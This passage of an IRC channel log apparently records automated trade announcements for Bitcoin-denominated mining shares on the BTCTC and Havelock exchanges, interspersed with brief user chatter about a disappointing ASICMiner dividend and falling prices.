= 0.348 BTC [-] Aug 21 16:09:51 [BTCTC] [LABCOIN] 20 @ 0.00235 = 0.047 BTC [-] Aug 21 16:09:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0348 BTC [-] Aug 21 16:09:53 [BTCTC] [LABCOIN] 1180 @ 0.002429 = 2.8662 BTC [+] Aug 21 16:09:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.0348 = 0.1044 BTC [-] Aug 21 16:09:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.0344 = 0.3096 BTC [-] Aug 21 16:09:57 [BTCTC] [TAT.ASICMINER] 48 @ 0.03439 = 1.6507 BTC [-] Aug 21 16:09:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.03439 BTC [-] Aug 21 16:09:59 [BTCTC] [ASICMINER-PT] 1 @ 3.398 BTC [+] Aug 21 16:10:57 [BTCTC] [ASICMINER-PT] 1 @ 3.396 BTC [-] Aug 21 16:10:58 [BTCTC] [ASICMINER-PT] 1 @ 3.398 BTC [+] Aug 21 16:11:07 [HAVELOCK] [AM100] 1 @ 0.0364 BTC [-] Aug 21 16:11:11 [HAVELOCK] [AM100] 2 @ 0.0361 = 0.0722 BTC [-] Aug 21 16:11:15 [HAVELOCK] [AM100] 5 @ 0.036 = 0.18 BTC [-] Aug 21 16:11:18 [HAVELOCK] [AM100] 3 @ 0.036 = 0.108 BTC [-] Aug 21 16:11:40 [HAVELOCK] [AM1] 1 @ 3.461 BTC [-] Aug 21 16:12:02 [HAVELOCK] [AM100] 4 @ 0.0359 = 0.1436 BTC [-] Aug 21 16:12:20 [BTCTC] [ASICMINER-PT] 2 @ 3.29 = 6.58 BTC [-] Aug 21 16:12:21 [HAVELOCK] [AM1] 1 @ 3.46 BTC [-] Aug 21 16:12:23 [BTCTC] [ASICMINER-PT] 1 @ 3.27 BTC [-] Aug 21 16:12:24 [BTCTC] [ASICMINER-PT] 1 @ 3.216 BTC [-] Aug 21 16:12:26 https://bitfunder.com/asset/CoinBr.iDiff-E paid out 0.00508103 BTC per share Aug 21 16:12:30 BitFunder.Com - Join the crowd, every BIT helps Aug 21 16:12:48 [HAVELOCK] [AM1] 1 @ 3.45 BTC [-] Aug 21 16:13:38 [HAVELOCK] [AM100] 16 @ 0.0359 = 0.5744 BTC [-] Aug 21 16:13:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.03486 = 0.6972 BTC [+] Aug 21 16:13:58 [HAVELOCK] [AM1] 1 @ 3.4101 BTC [-] Aug 21 16:14:21 [HAVELOCK] [AM1] 2 @ 3.41 = 6.82 BTC [-] Aug 21 16:14:24 [BTCTC] [ASICMINER-PT] 3 @ 3.215 = 9.645 BTC [-] Aug 21 16:15:11 [BTCTC] [ASICMINER-PT] 2 @ 3.214 = 6.428 BTC [-] Aug 21 16:15:28 [BTCTC] [TAT.ASICMINER] 12 @ 0.03411 = 0.4093 BTC [-] Aug 21 16:16:08 [BTCTC] [TAT.ASICMINER] 12 @ 0.03411 = 0.4093 BTC [-] Aug 21 16:16:10 [BTCTC] [TAT.ASICMINER] 38 @ 0.0341 = 1.2958 BTC [-] Aug 21 16:16:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.0341 = 0.4092 BTC [-] Aug 21 16:16:39 [BTCTC] [TAT.ASICMINER] 12 @ 0.0341 = 0.4092 BTC [-] Aug 21 16:16:40 [BTCTC] [TAT.ASICMINER] 13 @ 0.03402 = 0.4423 BTC [-] Aug 21 16:16:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.03401 = 0.1701 BTC [-] Aug 21 16:16:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.03401 = 0.3401 BTC [-] Aug 21 16:16:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.034 = 0.68 BTC [-] Aug 21 16:16:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.034 = 0.068 BTC [-] Aug 21 16:16:47 [BTCTC] [TAT.ASICMINER] 26 @ 0.034 = 0.884 BTC [-] Aug 21 16:16:54 [BTCTC] [ASICMINER-PT] 1 @ 3.219 BTC [+] Aug 21 16:16:55 [HAVELOCK] [XBOND] 1 @ 0.001184 BTC [-] Aug 21 16:17:20 [BTCTC] [ASICMINER-PT] 1 @ 3.201 BTC [-] Aug 21 16:17:27 [BTCTC] [DMS.MINING] 100 @ 0.00333 = 0.333 BTC [+] Aug 21 16:17:38 [BTCTC] [LABCOIN] 30 @ 0.002354 = 0.0706 BTC [-] Aug 21 16:17:39 [BTCTC] [LABCOIN] 85 @ 0.002353 = 0.2 BTC [-] Aug 21 16:17:40 [BTCTC] [LABCOIN] 14 @ 0.002347 = 0.0329 BTC [-] Aug 21 16:17:42 [BTCTC] [LABCOIN] 20 @ 0.002337 = 0.0467 BTC [-] Aug 21 16:17:43 [BTCTC] [LABCOIN] 75 @ 0.002312 = 0.1734 BTC [-] Aug 21 16:17:44 [BTCTC] [LABCOIN] 552 @ 0.002312 = 1.2762 BTC [-] Aug 21 16:17:45 [BTCTC] [LABCOIN] 1974 @ 0.002311 = 4.5619 BTC [-] Aug 21 16:18:04 [BTCTC] [ASICMINER-PT] 1 @ 3.219 BTC [+] Aug 21 16:18:06 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [-] Aug 21 16:18:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03401 BTC [+] Aug 21 16:19:03 [HAVELOCK] [AM100] 2 @ 0.03570001 = 0.0714 BTC [-] Aug 21 16:19:06 [HAVELOCK] [AM100] 3 @ 0.0357 = 0.1071 BTC [-] Aug 21 16:19:10 [HAVELOCK] [AM100] 5 @ 0.0355 = 0.1775 BTC [-] Aug 21 16:19:14 [HAVELOCK] [AM100] 10 @ 0.0355 = 0.355 BTC [-] Aug 21 16:19:17 [HAVELOCK] [AM100] 20 @ 0.0354 = 0.708 BTC [-] Aug 21 16:19:21 [HAVELOCK] [AM100] 20 @ 0.03501 = 0.7002 BTC [-] Aug 21 16:19:24 [BTCTC] [ASICMINER-PT] 1 @ 3.201 BTC [+] Aug 21 16:19:24 [HAVELOCK] [AM100] 75 @ 0.035 = 2.625 BTC [-] Aug 21 16:19:27 [HAVELOCK] [AM100] 1 @ 0.0349 BTC [-] Aug 21 16:19:31 [HAVELOCK] [AM100] 20 @ 0.0346 = 0.692 BTC [-] Aug 21 16:19:34 [HAVELOCK] [AM100] 10 @ 0.034509 = 0.3451 BTC [-] Aug 21 16:19:38 [HAVELOCK] [AM100] 10 @ 0.034508 = 0.3451 BTC [-] Aug 21 16:19:42 [HAVELOCK] [AM100] 10 @ 0.034507 = 0.3451 BTC [-] Aug 21 16:19:45 [HAVELOCK] [AM100] 10 @ 0.034506 = 0.3451 BTC [-] Aug 21 16:19:49 [HAVELOCK] [AM100] 4 @ 0.034505 = 0.138 BTC [-] Aug 21 16:20:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.034 = 0.136 BTC [-] Aug 21 16:20:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Aug 21 16:22:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0338 BTC [-] Aug 21 16:22:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.03361 = 0.3361 BTC [-] Aug 21 16:23:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.03301 = 0.099 BTC [-] Aug 21 16:23:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Aug 21 16:23:10 [BTCTC] [TAT.ASICMINER] 14 @ 0.033 = 0.462 BTC [-] Aug 21 16:23:24 [BTCTC] [ASICMINER-PT] 1 @ 3.298 BTC [+] Aug 21 16:23:41 [BTCTC] [TAT.ASICMINER] 11 @ 0.03212 = 0.3533 BTC [-] Aug 21 16:23:42 [BTCTC] [TAT.ASICMINER] 16 @ 0.03211 = 0.5138 BTC [-] Aug 21 16:24:35 [BTCTC] [ASICMINER-PT] 2 @ 3.299 = 6.598 BTC [+] Aug 21 16:24:58 [HAVELOCK] [CFIG] 30 @ 0.15 = 4.5 BTC Aug 21 16:25:53 [HAVELOCK] [AM100] 6 @ 0.034505 = 0.207 BTC [-] Aug 21 16:25:57 [HAVELOCK] [AM100] 10 @ 0.034504 = 0.345 BTC [-] Aug 21 16:26:01 [HAVELOCK] [AM100] 10 @ 0.034503 = 0.345 BTC [-] Aug 21 16:26:03 [BTCTC] [ASICMINER-PT] 1 @ 3.299 BTC [+] Aug 21 16:26:04 [HAVELOCK] [AM100] 199 @ 0.03450001 = 6.8655 BTC [-] Aug 21 16:26:07 [HAVELOCK] [AM100] 2 @ 0.0345 = 0.069 BTC [-] Aug 21 16:26:10 [BTCTC] [ASICMINER-PT] 1 @ 3.299 BTC [+] Aug 21 16:26:11 [BTCTC] [ASICMINER-PT] 3 @ 3.3 = 9.9 BTC [+] Aug 21 16:26:13 [HAVELOCK] [AM100] 20 @ 0.0345 = 0.69 BTC [-] Aug 21 16:26:16 [HAVELOCK] [AM100] 1 @ 0.03441 BTC [-] Aug 21 16:26:19 [HAVELOCK] [AM100] 10 @ 0.0344 = 0.344 BTC [-] Aug 21 16:26:22 [HAVELOCK] [AM100] 10 @ 0.034303 = 0.343 BTC [-] Aug 21 16:26:24 [BTCTC] [LABCOIN] 14 @ 0.002397 = 0.0336 BTC [+] Aug 21 16:26:25 [HAVELOCK] [AM100] 10 @ 0.034302 = 0.343 BTC [-] Aug 21 16:26:28 [BTCTC] [LABCOIN] 85 @ 0.002402 = 0.2042 BTC [+] Aug 21 16:26:29 [BTCTC] [ASICMINER-PT] 1 @ 3.201 BTC [-] Aug 21 16:26:30 [HAVELOCK] [AM100] 10 @ 0.034301 = 0.343 BTC [-] Aug 21 16:26:32 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Aug 21 16:26:33 [BTCTC] [LABCOIN] 30 @ 0.002402 = 0.0721 BTC [+] Aug 21 16:26:34 [BTCTC] [ASICMINER-PT] 1 @ 3.125 BTC [-] Aug 21 16:26:35 [BTCTC] [ASICMINER-PT] 1 @ 3.12 BTC [-] Aug 21 16:26:36 [BTCTC] [ASICMINER-PT] 3 @ 3.107 = 9.321 BTC [-] Aug 21 16:26:37 [HAVELOCK] [AM100] 12 @ 0.03421 = 0.4105 BTC [-] Aug 21 16:26:39 [BTCTC] [ASICMINER-PT] 1 @ 3.106105 BTC [-] Aug 21 16:26:39 [BTCTC] [ASICMINER-PT] 5 @ 3.106 = 15.53 BTC [-] Aug 21 16:26:40 [BTCTC] [ASICMINER-PT] 1 @ 3.101 BTC [-] Aug 21 16:26:41 [BTCTC] [ASICMINER-PT] 5 @ 3.1 = 15.5 BTC [-] Aug 21 16:27:04 [BTCTC] [LABCOIN] 146 @ 0.002402 = 0.3507 BTC [+] Aug 21 16:27:07 [BTCTC] [LABCOIN] 20 @ 0.002335 = 0.0467 BTC [-] Aug 21 16:27:08 [BTCTC] [LABCOIN] 306 @ 0.002312 = 0.7075 BTC [-] Aug 21 16:27:09 [BTCTC] [LABCOIN] 226 @ 0.002311 = 0.5223 BTC [-] Aug 21 16:27:11 [BTCTC] [LABCOIN] 2222 @ 0.00231 = 5.1328 BTC [-] Aug 21 16:27:12 [BTCTC] [LABCOIN] 125 @ 0.002309 = 0.2886 BTC [-] Aug 21 16:27:13 [BTCTC] [LABCOIN] 1000 @ 0.002308 = 2.308 BTC [-] Aug 21 16:27:19 [BTCTC] [LABCOIN] 30 @ 0.002308 = 0.0692 BTC [-] Aug 21 16:27:28 [HAVELOCK] [AM100] 8 @ 0.03421 = 0.2737 BTC [-] Aug 21 16:27:32 [HAVELOCK] [AM100] 10 @ 0.0342 = 0.342 BTC [-] Aug 21 16:27:36 [HAVELOCK] [AM100] 8 @ 0.0341 = 0.2728 BTC [-] Aug 21 16:27:39 [HAVELOCK] [AM100] 2 @ 0.03400002 = 0.068 BTC [-] Aug 21 16:27:43 [HAVELOCK] [AM100] 10 @ 0.034 = 0.34 BTC [-] Aug 21 16:27:46 [HAVELOCK] [AM100] 20 @ 0.034 = 0.68 BTC [-] Aug 21 16:27:50 [HAVELOCK] [AM100] 99 @ 0.03390101 = 3.3562 BTC [-] Aug 21 16:27:54 [HAVELOCK] [AM100] 2 @ 0.03355 = 0.0671 BTC [-] Aug 21 16:27:57 [HAVELOCK] [AM100] 20 @ 0.0335 = 0.67 BTC [-] Aug 21 16:28:01 [HAVELOCK] [AM100] 10 @ 0.0331 = 0.331 BTC [-] Aug 21 16:28:04 [HAVELOCK] [AM100] 99 @ 0.03290101 = 3.2572 BTC [-] Aug 21 16:28:07 [HAVELOCK] [AM100] 3 @ 0.032 = 0.096 BTC [-] Aug 21 16:28:11 [HAVELOCK] [AM100] 9 @ 0.03190101 = 0.2871 BTC [-] Aug 21 16:28:20 [BTCTC] [ASICMINER-PT] 1 @ 3.097 BTC [-] Aug 21 16:28:21 [BTCTC] [ASICMINER-PT] 6 @ 3.098 = 18.588 BTC [+] Aug 21 16:28:22 [BTCTC] [ASICMINER-PT] 5 @ 3.1 = 15.5 BTC [+] Aug 21 16:28:41 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [-] Aug 21 16:28:43 [BTCTC] [ASICMINER-PT] 2 @ 3.1 = 6.2 BTC [+] Aug 21 16:28:55 [BTCTC] [ASICMINER-PT] 4 @ 3.1 = 12.4 BTC [+] Aug 21 16:28:57 [BTCTC] [LABCOIN] 1 @ 0.002403 BTC [+] Aug 21 16:29:14 [HAVELOCK] [AM100] 90 @ 0.03190101 = 2.8711 BTC [-] Aug 21 16:29:17 [HAVELOCK] [AM100] 99 @ 0.03090101 = 3.0592 BTC [-] Aug 21 16:30:00 [BTCTC] [LABCOIN] 3 @ 0.0012 = 0.0036 BTC [-] Aug 21 16:30:02 [BTCTC] [LABCOIN] 9 @ 0.002403 = 0.0216 BTC [+] Aug 21 16:30:17 [HAVELOCK] [AM100] 1 @ 0.0294 BTC [-] Aug 21 16:30:35 [BTCTC] [LABCOIN] 2 @ 0.0012 = 0.0024 BTC [-] Aug 21 16:31:15 [HAVELOCK] [AM1] 4 @ 3.26 = 13.04 BTC [-] Aug 21 16:31:19 [HAVELOCK] [AM1] 3 @ 3.1251 = 9.3753 BTC [-] Aug 21 16:31:21 [BTCTC] [BASIC-MINING] 3 @ 0.2677 = 0.8031 BTC [+] Aug 21 16:31:43 [09:30:53] <@assbot> [BTCTC] [LABCOIN] 2 @ 0.0012 = 0.0024 BTC [-] Aug 21 16:31:44 ?? Aug 21 16:31:54 that looks.. wrong Aug 21 16:32:00 [BTCTC] [TAT.ASICMINER] 52 @ 0.03211 = 1.6697 BTC [-] Aug 21 16:32:01 [BTCTC] [TAT.ASICMINER] 17 @ 0.03211 = 0.5459 BTC [-] Aug 21 16:32:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.032 BTC [-] Aug 21 16:32:04 option trade Aug 21 16:32:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.032 = 1.6 BTC [-] Aug 21 16:32:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.03152 = 0.1576 BTC [-] Aug 21 16:32:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03151 BTC [-] Aug 21 16:32:07 [BTCTC] [TAT.ASICMINER] 30 @ 0.03151 = 0.9453 BTC [-] Aug 21 16:32:08 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Aug 21 16:32:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.03111 = 0.3111 BTC [-] Aug 21 16:32:11 [BTCTC] [TAT.ASICMINER] 60 @ 0.03111 = 1.8666 BTC [-] Aug 21 16:32:12 [BTCTC] [TAT.ASICMINER] 30 @ 0.0311 = 0.933 BTC [-] Aug 21 16:32:12 that got exercised Aug 21 16:32:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [-] Aug 21 16:32:13 o Aug 21 16:32:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.031 = 0.155 BTC [-] Aug 21 16:32:20 yea they mess with the print Aug 21 16:32:28 [BTCTC] [ASICMINER-PT] 8 @ 3.7 = 29.6 BTC [+] Aug 21 16:32:36 whats goin gon with asicminer? everyone dumping Aug 21 16:32:37 ha Aug 21 16:32:56 bad divs, no communication from friedcat about what's going on Aug 21 16:33:01 that's what's going on Aug 21 16:33:07 what was the div Aug 21 16:33:14 well, not bad, just less than people expect Aug 21 16:33:18 around 0.012 I think Aug 21 16:33:22 yeah Aug 21 16:33:26 yea thats low Aug 21 16:33:27 0.01226019 Aug 21 16:33:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0301 = 0.1505 BTC [-] Aug 21 16:33:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.03 = 0.09 BTC [-] Aug 21 16:33:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.03 = 0.09 BTC [-] Aug 21 16:33:36 [BTCTC] [TAT.ASICMINER] 29 @ 0.03 = 0.87 BTC [-] Aug 21 16:33:39 ah Aug 21 16:34:06 That's about half of what it normally is, I believe. Aug 21 16:34:17 this communication thing... da hell do people expect him to say. Aug 21 16:34:17 yea Aug 21 16:34:22 [BTCTC] [ASICMINER-PT] 1 @ 3.247 BTC [-] Aug 21 16:34:24 That network diffidculty will get you. Aug 21 16:34:30 difficulty* Aug 21 16:34:36 [BTCTC] [ACTIVEMINING] 998 @ 0.005278 = 5.2674 BTC [-] Aug 21 16:34:48 even at a purely mining div at 10% the yield is good on AM Aug 21 16:34:52 He had a report fairly recently. Aug 21 16:35:09 What div out there is better at the moment? Aug 21 16:35:21 depends how you price your risks. Aug 21 16:35:38 if you understand pmb dividends are mostly your own capital being returned or if you think ity's actually a dividend. Aug 21 16:36:28 i think people expected more hardware sales Aug 21 16:36:48 lotta compoetition on that front obviously Aug 21 16:36:50 [HAVELOCK] [AM100] 1 @ 0.03 BTC [+] Aug 21 16:36:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [+] Aug 21 16:36:55 and also they sold a ton Aug 21 16:37:02 [BTCTC] [ASICMINER-PT] 1 @ 3.229 BTC [-] Aug 21 16:37:04 certainly sold more than was projected. Aug 21 16:37:14 [BTCTC] [ASICMINER-PT] 1 @ 3.104 BTC [-] Aug 21 16:37:14 [BTCTC] [ASICMINER-PT] 3 @ 3.103 = 9.309 BTC [-] Aug 21 16:37:15 [BTCTC] [ASICMINER-PT] 3 @ 3.102 = 9.306 BTC [-] Aug 21 16:37:17 [BTCTC] [ASICMINER-PT] 3 @ 3.1 = 9.3 BTC [-] Aug 21 16:37:18 [BTCTC] [ASICMINER-PT] 2 @ 3.061 = 6.122 BTC [-] Aug 21 16:37:19 [BTCTC] [ASICMINER-PT] 3 @ 3.06 = 9.18 BTC [-] Aug 21 16:37:22 [HAVELOCK] [AM100] 20 @ 0.03 = 0.6 BTC [+] Aug 21 16:37:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.035 = 0.21 BTC [+] Aug 21 16:38:19 [BTCTC] [BTC-GROWTH] 5 @ 0.0997 = 0.4985 BTC [-] Aug 21 16:38:22 [HAVELOCK] [XBOND] 3 @ 0.00115 = 0.0035 BTC [-] Aug 21 16:38:33 [BTCTC] [ASICMINER-PT] 1 @ 3.061 BTC [+] Aug 21 16:39:47 [BTCTC] [LABCOIN] 15 @ 0.00239 = 0.0359 BTC [+] Aug 21 16:39:48 [BTCTC] [LABCOIN] 20 @ 0.002391 = 0.0478 BTC [+] Aug 21 16:39:49 [BTCTC] [LABCOIN] 642 @ 0.002398 = 1.5395 BTC [+] Aug 21 16:40:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.0302 = 1.51 BTC [-] Aug 21 16:40:22 [BTCTC] [HOSTED-MINING] 17 @ 0.28 = 4.76 BTC [+] Aug 21 16:41:16 [BTCTC] [KENILWORTH] 10 @ 0.001601 = 0.016 BTC [-] Aug 21 16:41:18 [BTCTC] [KENILWORTH] 1 @ 0.001601 BTC [-] Aug 21 16:41:19 [BTCTC] [KENILWORTH] 40 @ 0.001601 = 0.064 BTC [-] Aug 21 16:41:20 [BTCTC] [KENILWORTH] 500 @ 0.001601 = 0.8005 BTC [-] Aug 21 16:41:22 [BTCTC] [KENILWORTH] 3000 @ 0.0016 = 4.8 BTC [-] Aug 21 16:41:23 [BTCTC] [KENILWORTH] 1 @ 0.001592 BTC [-] Aug 21 16:41:24 [BTCTC] [KENILWORTH] 33 @ 0.00159 = 0.0525 BTC [-] Aug 21 16:41:25 [BTCTC] [KENILWORTH] 475 @ 0.001574 = 0.7477 BTC [-] Aug 21 16:41:26 [BTCTC] [KENILWORTH] 999 @ 0.001573 = 1.5714 BTC [-] Aug 21 16:41:27 [BTCTC] [KENILWORTH] 1 @ 0.00157 BTC [-] Aug 21 16:41:28 [BTCTC] [KENILWORTH] 10 @ 0.00151 = 0.0151 BTC [-] Aug 21 16:41:29 [BTCTC] [KENILWORTH] 1 @ 0.001434 BTC [-] Aug 21 16:41:30 [BTCTC] [KENILWORTH] 80 @ 0.00123 = 0.0984 BTC [-] Aug 21 16:41:32 [BTCTC] [KENILWORTH] 50 @ 0.00122 = 0.061 BTC [-] Aug 21 16:41:33 [BTCTC] [KENILWORTH] 50 @ 0.00122 = 0.061 BTC [-] Aug 21 16:41:34 [BTCTC] [KENILWORTH] 1999 @ 0.001208 = 2.4148 BTC [-] Aug 21 16:41:35 [BTCTC] [KENILWORTH] 1213 @ 0.001201 = 1.4568 BTC [-] Aug 21 16:41:42 [BTCTC] [ASICMINER-PT] 1 @ 3.072 BTC [+] Aug 21 16:41:43 [BTCTC] [ASICMINER-PT] 1 @ 3.07 BTC [-] Aug 21 16:41:45 [BTCTC] [ASICMINER-PT] 5 @ 3.07 = 15.35 BTC [-] Aug 21 16:41:46 [BTCTC] [ASICMINER-PT] 2 @ 3.06 = 6.12 BTC [-] Aug 21 16:41:48 [HAVELOCK] [XBOND] 7 @ 0.00115 = 0.0081 BTC [-] Aug 21 16:41:50 [BTCTC] [ASICMINER-PT] 1 @ 3.05 BTC [-] Aug 21 16:41:52 [BTCTC] [ASICMINER-PT] 7 @ 3.04 = 21.28 BTC [-] Aug 21 16:41:53 [BTCTC] [ASICMINER-PT] 1 @ 3.011 BTC [-] Aug 21 16:41:54 [BTCTC] [ASICMINER-PT] 11 @ 3.01 = 33.11 BTC [-] Aug 21 16:41:55 [BTCTC] [ASICMINER-PT] 3 @ 3.01 = 9.03 BTC [-] Aug 21 16:41:56 [BTCTC] [ASICMINER-PT] 5 @ 3.002 = 15.01 BTC [-] Aug 21 16:41:56 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 16:41:57 [BTCTC] [ASICMINER-PT] 3 @ 3 = 9 BTC [-] Aug 21 16:41:58 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [-] Aug 21 16:42:06 [HAVELOCK] [XBOND] 1 @ 0.00115 BTC [-] Aug 21 16:42:36 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 21 16:42:37 [BTCTC] [ASICMINER-PT] 11 @ 3 = 33 BTC [+] Aug 21 16:42:39 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 21 16:42:39 wow, sub-3 Aug 21 16:42:43 [BTCTC] [BASIC-MINING] 1 @ 0.26 BTC [-] Aug 21 16:42:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0304 = 0.304 BTC [+] Aug 21 16:42:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0304 = 0.304 BTC [+] Aug 21 16:42:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.0303 = 0.606 BTC [-] Aug 21 16:42:59 [BTCTC] [TAT.ASICMINER] 100 @ 0.0303 = 3.03 BTC [-] Aug 21 16:43:01 [BTCTC] [TAT.ASICMINER] 22 @ 0.0302 = 0.6644 BTC [-] Aug 21 16:43:02 [BTCTC] [TAT.ASICMINER] 34 @ 0.0302 = 1.0268 BTC [-] Aug 21 16:43:03 [BTCTC] [TAT.ASICMINER] 18 @ 0.03 = 0.54 BTC [-] Aug 21 16:43:04 [BTCTC] [TAT.ASICMINER] 30 @ 0.03 = 0.9 BTC [-] Aug 21 16:43:21 x_x Aug 21 16:43:30 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Aug 21 16:43:41 [BTCTC] [BASIC-MINING] 1 @ 0.254 BTC [-] Aug 21 16:44:00 [BTCTC] [ASICMINER-PT] 5 @ 3.5 = 17.5 BTC [+] Aug 21 16:44:11 [BTCTC] [LABCOIN] 30 @ 0.002347 = 0.0704 BTC [-] Aug 21 16:44:13 [BTCTC] [LABCOIN] 85 @ 0.002346 = 0.1994 BTC [-] Aug 21 16:44:13 [BTCTC] [LABCOIN] 20 @ 0.002342 = 0.0468 BTC [-] Aug 21 16:44:14 [BTCTC] [LABCOIN] 62 @ 0.002304 = 0.1428 BTC [-] Aug 21 16:44:15 [BTCTC] [LABCOIN] 500 @ 0.002303 = 1.1515 BTC [-] Aug 21 16:44:16 [BTCTC] [LABCOIN] 1846 @ 0.002302 = 4.2495 BTC [-] Aug 21 16:44:25 well it was overpriced, what. Aug 21 16:44:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.029103 = 0.0873 BTC [-] Aug 21 16:44:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.0291 = 0.4365 BTC [-] Aug 21 16:44:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.0291 = 0.582 BTC [-] Aug 21 16:44:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.0291 = 0.1164 BTC [-] Aug 21 16:45:10 [HAVELOCK] [LABCO] 193 @ 0.0023 = 0.4439 BTC [+] Aug 21 16:45:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.029003 = 0.116 BTC [-] Aug 21 16:45:58 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 16:45:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Aug 21 16:46:00 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 21 16:46:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.029 = 0.116 BTC [-] Aug 21 16:46:21 [BTCTC] [ASICMINER-PT] 2 @ 2.921 = 5.842 BTC [-] Aug 21 16:46:23 [HAVELOCK] [LABCO] 227 @ 0.0023 = 0.5221 BTC [+] Aug 21 16:46:26 [BTCTC] [ASICMINER-PT] 1 @ 2.921 BTC [-] Aug 21 16:46:51 [BTCTC] [ACTIVEMINING] 10 @ 0.005209 = 0.0521 BTC [-] Aug 21 16:47:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Aug 21 16:47:07 [BTCTC] [TAT.ASICMINER] 8 @ 0.029 = 0.232 BTC [-] Aug 21 16:47:48 https://twitter.com/JeredKenna/status/352198611154632707 Aug 21 16:47:50 lol Aug 21 16:47:51 Twitter / JeredKenna: Walking back to the hotel and ... Aug 21 16:48:05 Haha. Aug 21 16:48:45 [BTCTC] [TAT.ASICMINER] 11 @ 0.029 = 0.319 BTC [-] Aug 21 16:49:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.0286 = 0.572 BTC [-] Aug 21 16:49:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.028581 = 0.0857 BTC [-] Aug 21 16:49:38 [BTCTC] [TAT.ASICMINER] 16 @ 0.02812 = 0.4499 BTC [-] Aug 21 16:49:39 [BTCTC] [TAT.ASICMINER] 25 @ 0.02811 = 0.7028 BTC [-] Aug 21 16:49:40 [BTCTC] [TAT.ASICMINER] 55 @ 0.02811 = 1.5461 BTC [-] Aug 21 16:49:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.028011 = 0.084 BTC [-] Aug 21 16:50:08 [HAVELOCK] [XBOND] 2 @ 0.00115 = 0.0023 BTC [-] Aug 21 16:50:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [+] Aug 21 16:50:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.029 = 0.087 BTC [+] Aug 21 16:50:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005209 = 0.1563 BTC [-] Aug 21 16:50:40 [BTCTC] [ACTIVEMINING] 500 @ 0.005208 = 2.604 BTC [-] Aug 21 16:50:49 [HAVELOCK] [SDSTM] 2 @ 0.00569 = 0.0114 BTC [+] Aug 21 16:51:09 jurov reminds me of that nicholas cage movie Aug 21 16:51:39 weatherman or w/e it was called Aug 21 16:51:49 [BTCTC] [LABCOIN] 30 @ 0.002329 = 0.0699 BTC [+] Aug 21 16:51:50 [BTCTC] [LABCOIN] 85 @ 0.002328 = 0.1979 BTC [-] Aug 21 16:51:51 [BTCTC] [LABCOIN] 20 @ 0.002312 = 0.0462 BTC [-] Aug 21 16:51:53 [BTCTC] [LABCOIN] 2308 @ 0.002304 = 5.3176 BTC [-] Aug 21 16:52:36 [HAVELOCK] [SDSTM] 3 @ 0.00569 = 0.0171 BTC [+] Aug 21 16:52:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.0288 = 0.1152 BTC [-] Aug 21 16:52:44 [BTCTC] [TAT.ASICMINER] 80 @ 0.0287 = 2.296 BTC [-] Aug 21 16:52:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [-] Aug 21 16:52:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [-] Aug 21 16:52:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.0278 = 0.1946 BTC [-] Aug 21 16:53:17 [HAVELOCK] [AM100] 1 @ 0.031 BTC [+] Aug 21 16:53:20 [HAVELOCK] [AM100] 1 @ 0.03001 BTC [-] Aug 21 16:53:24 [HAVELOCK] [AM100] 34 @ 0.03000001 = 1.02 BTC [-] Aug 21 16:53:28 [HAVELOCK] [AM100] 9 @ 0.03 = 0.27 